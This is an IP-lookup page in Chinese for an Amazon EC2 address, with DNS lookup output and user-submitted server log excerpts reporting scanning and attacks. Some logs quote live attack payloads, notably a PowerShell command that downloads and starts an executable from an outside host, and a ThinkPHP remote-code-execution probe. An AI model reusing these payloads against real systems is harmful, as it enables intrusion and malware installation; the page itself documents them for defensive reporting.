54.148.207.64 - IPInfo

基本信息:

城市(city): Boardman

省份(region): Oregon

国家(country): United States

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

暂无关于此IP的讨论, 沙发请点上方按钮

相同子网IP讨论:

暂无关于此IP所属子网相关IP的讨论.

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 54.148.207.64
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 43487
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;54.148.207.64.			IN	A

;; AUTHORITY SECTION:
.			525	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2023052800 1800 900 604800 86400

;; Query time: 66 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun May 28 14:11:53 CST 2023
;; MSG SIZE  rcvd: 106

HOST信息:

64.207.148.54.in-addr.arpa domain name pointer ec2-54-148-207-64.us-west-2.compute.amazonaws.com.

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
64.207.148.54.in-addr.arpa	name = ec2-54-148-207-64.us-west-2.compute.amazonaws.com.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
79.127.127.253	attack	php数据库攻击 79.127.127.253 - - [18/Apr/2019:16:08:43 +0800] "GET /muieblackcat HTTP/1.1" 301 194 "-" "-" 79.127.127.253 - - [18/Apr/2019:16:08:44 +0800] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "-" 79.127.127.253 - - [18/Apr/2019:16:08:45 +0800] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "-" 79.127.127.253 - - [18/Apr/2019:16:08:45 +0800] "GET //pma/scripts/setup.php HTTP/1.1" 301 194 "-" "-" 79.127.127.253 - - [18/Apr/2019:16:08:47 +0800] "GET //myadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "-" 79.127.127.253 - - [18/Apr/2019:16:08:47 +0800] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "-"	2019-04-18 16:10:30
66.240.205.34	attack	66.240.205.34 - - [24/Apr/2019:09:56:25 +0800] "145.ll\|'\|'\|SGFjS2VkX0Q0OTkwNjI3\|'\|'\|WIN-JNAPIER0859\|'\|'\|JNapier\|'\|'\|19-02-01\|'\|'\|\|'\|'\|Win 7 Professional SP1x64\|'\|'\|No\|'\|'\|0.7d\|'\|'\|..\|'\|'\|AA==\|'\|'\|112.inf\|'\|'\|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act\|'\|'\|AA==" 400 182 "-" "-"	2019-04-24 09:58:11
181.209.64.98	bots	181.209.64.98 - - [22/Apr/2019:10:38:45 +0800] "GET /check-ip/94.36.13.15 HTTP/1.1" 200 8293 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 GTB7.1" 181.209.64.98 - - [22/Apr/2019:10:39:08 +0800] "GET /check-ip/94.36.13.15 HTTP/1.1" 200 8435 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 ( .NET CLR 3.5.30729)" 181.209.64.98 - - [22/Apr/2019:10:39:28 +0800] "GET /check-ip/94.36.13.15 HTTP/1.1" 200 8168 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.3) Gecko/20121221 Firefox/3.6.8" 181.209.64.98 - - [22/Apr/2019:10:39:50 +0800] "GET /check-ip/94.36.13.15 HTTP/1.1" 200 8149 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0.6"	2019-04-22 10:41:06
111.206.36.142	bots	111.206.36.142 - - [24/Apr/2019:08:50:04 +0800] "GET /index.php/category/root/apple/ HTTP/1.1" 200 20644 "http://www.baidu.com/s?wd=sleptij3" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" 111.206.36.142 - - [24/Apr/2019:08:50:05 +0800] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.1.1 HTTP/1.1" 200 4855 "https://www.eznewstoday.com/index.php/category/root/apple/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 " 111.206.36.142 - - [24/Apr/2019:08:50:05 +0800] "GET /wp-content/plugins/wp-quicklatex/css/quicklatex-format.css?ver=5.1.1 HTTP/1.1" 200 1032 "https://www.eznewstoday.com/index.php/category/root/apple/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/2 0100101 Firefox/43.0" 111.206.36.11 - - [24/Apr/2019:08:50:05 +0800] "GET /wp-content/themes/twentyfifteen/genericons/genericons.css?ver=3.2 HTTP/1.1" 200 17235 "https://www.eznewstoday.com/index.php/category/root/apple/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/2010	2019-04-24 12:24:25
134.175.20.103	attack	恶意攻击 134.175.20.103 - - [18/Apr/2019:20:51:46 +0800] "POST /sha.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" 134.175.20.103 - - [18/Apr/2019:20:51:46 +0800] "POST /ppx.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" 134.175.20.103 - - [18/Apr/2019:20:51:46 +0800] "POST /1.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" 134.175.20.103 - - [18/Apr/2019:20:51:46 +0800] "POST /confg.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" 134.175.20.103 - - [18/Apr/2019:20:51:46 +0800] "POST /conf1g.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" 134.175.20.103 - - [18/Apr/2019:20:51:46 +0800] "POST /confg.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"	2019-04-18 20:52:46
111.230.237.133	botsattackproxy	111.230.237.133 - - [23/Apr/2019:06:20:53 +0800] "CONNECT www.google.com:443 HTTP/1.1" 405 516 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2" 111.230.237.133 - - [23/Apr/2019:06:20:53 +0800] "GET http://www.google.com/ HTTP/1.1" 200 150450 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"	2019-04-23 08:10:16
118.25.71.65	attack	118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 301 194 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 404 232 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"	2019-04-19 15:56:51
120.26.236.178	attack	120.26.236.178 - - [24/Apr/2019:19:30:20 +0800] "GET /TP/public/index.php HTTP/1.1" 404 476 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 120.26.236.178 - - [24/Apr/2019:19:30:20 +0800] "GET /TP/index.php HTTP/1.1" 404 469 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 120.26.236.178 - - [24/Apr/2019:19:30:20 +0800] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 487 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox /3.6)" 120.26.236.178 - - [24/Apr/2019:19:30:20 +0800] "GET /html/public/index.php HTTP/1.1" 404 478 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 120.26.236.178 - - [24/Apr/2019:19:30:21 +0800] "GET /public/index.php HTTP/1.1" 404 473 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 120.26.236.178 - - [24/Apr/2019:19:30:21 +0800] "GET /TP/html/public/index.php HTTP/1.1" 404 481 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 120.26.236.178 - - [24/Apr/2019:19:30:21 +0800] "GET /elrekt.php HTTP/1.1" 404 467 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 120.26.236.178 - - [24/Apr/2019:19:30:22 +0800] "GET /index.php HTTP/1.1" 404 466 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 120.26.236.178 - - [24/Apr/2019:19:30:22 +0800] "GET / HTTP/1.1" 200 24601 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"	2019-04-25 05:29:09
139.59.23.231	attack	ZmEu是个phpMyAdmin脆弱性检查工具，可以发现phpMyAdmin的漏洞，从而进行攻击 139.59.23.231 - - [20/Apr/2019:10:24:06 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 498 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:07 +0800] "GET /phpMyAdmin/setup.php HTTP/1.1" 404 477 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:08 +0800] "GET /phpmyadmin/setup.php HTTP/1.1" 404 477 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:10 +0800] "GET /phpmy/scripts/setup.php HTTP/1.1" 404 480 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:10 +0800] "GET /scripts/setup.php/index.php HTTP/1.1" 404 484 "-" "ZmEu" 139.59.23.231 - - [20/Apr/2019:10:24:11 +0800] "GET HTTP/1.1" 400 0 "-" "-" 139.59.23.231 - - [20/Apr/2019:10:24:12 +0800] "GET HTTP/1.1" 400 0 "-" "-"	2019-04-20 10:49:01
82.221.105.7	bots	82.221.105.7 - - [19/Apr/2019:14:31:43 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 82.221.105.7 - - [19/Apr/2019:14:31:44 +0800] "GET /robots.txt HTTP/1.1" 301 194 "-" "-" 82.221.105.7 - - [19/Apr/2019:14:31:45 +0800] "GET /sitemap.xml HTTP/1.1" 301 194 "-" "-" 82.221.105.7 - - [19/Apr/2019:14:31:46 +0800] "GET /.well-known/security.txt HTTP/1.1" 301 194 "-" "-" 82.221.105.7 - - [19/Apr/2019:14:31:48 +0800] "GET /favicon.ico HTTP/1.1" 301 194 "-" "python-requests/2.10.0"	2019-04-19 14:32:28
119.74.94.143	bots	119.74.94.143 - - [23/Apr/2019:14:42:58 +0800] "GET /check-ip/54.36.127.189 HTTP/1.1" 200 9821 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 119.74.94.143 - - [23/Apr/2019:14:42:58 +0800] "GET /check-ip/222.186.10.54 HTTP/1.1" 200 9398 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 119.74.94.143 - - [23/Apr/2019:14:42:58 +0800] "GET /check-ip/200.53.15.17 HTTP/1.1" 200 8618 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 119.74.94.143 - - [23/Apr/2019:14:42:59 +0800] "GET /check-ip/123.206.44.225 HTTP/1.1" 200 8700 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 119.74.94.143 - - [23/Apr/2019:14:42:59 +0800] "GET /check-ip/156.219.69.226 HTTP/1.1" 200 10018 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 119.74.94.143 - - [23/Apr/2019:14:42:59 +0800] "GET /check-ip/35.200.107.73 HTTP/1.1" 200 9130 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"	2019-04-23 14:44:49
185.195.27.254	botsattack	185.195.27.254 - - [18/Apr/2019:06:11:46 +0800] "GET /wp2/wp-login.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 185.195.27.254 - - [18/Apr/2019:06:11:47 +0800] "GET /wp2/wp-login.php HTTP/1.1" 404 209 "http://118.25.52.138/wp2/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"	2019-04-18 06:12:46
203.208.60.97	bots	Googlebot，中国谷歌	2019-04-19 16:45:34
122.152.211.94	botsattack	122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /login HTTP/1.1" 301 194 "-" "-" 122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /customers/1 HTTP/1.1" 301 194 "-" "-" 122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /gs-guide-websocket/803/a8vbaovq/htmlfile?c=_jp.local HTTP/1.1" 301 194 "-" "-" 122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 301 194 "-" "-" 122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "POST /index.php?s=captcha HTTP/1.1" 301 194 "-" "-" 122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /index.php?s=/Index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=abc HTTP/1.1" 301 194 "-" "-" 122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "POST /website/blog/ HTTP/1.1" 301 194 "-" "-"	2019-04-18 12:23:38
1.10.189.153	attack	1.10.189.153 - - [23/Apr/2019:15:23:39 +0800] "POST https://www.eznewstoday.com/wp-login.php HTTP/1.1" 200 5729 "https://www.eznewstoday.com/wp-login.php" "Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.89.36 (KHTML, like Gecko) Version/5.2.7 Safari/530.61"	2019-04-23 15:33:26

最近上报的IP列表

92.52.80.15	31.94.19.235	92.249.8.231	232.161.223.143
213.34.188.130	237.115.88.32	103.82.154.234	108.27.1.44
252.67.14.46	34.211.106.160	39.109.139.239	209.0.160.10
78.152.81.92	110.208.6.111	196.2.36.52	175.211.180.87
22.176.4.45	180.208.131.44	6.51.66.198	92.74.181.31